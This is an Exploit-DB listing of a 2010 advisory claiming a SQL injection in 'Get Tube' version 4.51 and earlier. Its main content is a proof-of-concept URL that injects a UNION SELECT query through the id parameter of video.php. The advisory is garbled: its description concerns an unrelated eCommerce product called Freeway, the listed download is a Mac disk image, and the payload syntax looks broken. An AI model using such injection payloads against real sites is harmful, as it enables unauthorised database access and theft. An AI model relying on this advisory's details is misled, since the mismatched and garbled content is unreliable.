Get Tube - SQL Injection

EDB-ID:

14637




Platform:

PHP

Date:

2010-08-13


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

-----------------------------------------------------------------------------------------
Get Tube 4.51 & All Versions SQL Injection Vulnerability
-----------------------------------------------------------------------------------------
 
[+]Title Get Tube 4.51 & All Versions SQL Injection Vulnerability
[+]Author Mr.P3rfekT
[+]Contact  Mr.P3rfekT@gmail.com
[+]Tested on   Unix 10.1
[+]Date 2010/8/13
---------------------------------------------------------------------------
[~] Site: http://www.Mr-P3rfekT.Net
[~] Vendor: http://www.svcreation.fr/
[~] Download: http://simon.vrel.free.fr/downloads/GetTube.dmg
[~] Version: 4.51 & 4.5 & v.4.01  v.3.02 v.2.3
[~] Price : Free
==========Pwned By Mr.P3rfekT==========
[+] Description: Freeway is the most advanced Open Source eCommerce platform and includes an array of features not found in extremely expensive commercial systems. Without having to purchase a commercial system and then paying a developer to build custom installation, Freeway does most of what you need out of the box. For example, instead of getting dragged into purchasing an overpriced products based system and having a developer struggle for weeks and eventually fail to force products sales into event sales, Freeway already support events AND services AND subscriptions.
==========================================
 
[+] Dork: No DoRks For Script Kiddies
 
==========================================
 
[ I ].  SQL Vulnerability
=+=+=+=+=+=+=+=+=+
 
[P0C]:  http://127.0.0.1/path/video.php?id= SQLi
  

Line : 1 
Column : 1064
 
http://127.0.0.1/path/video.php?id=-4444 union select swfurl 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from  archive

===========================================================================================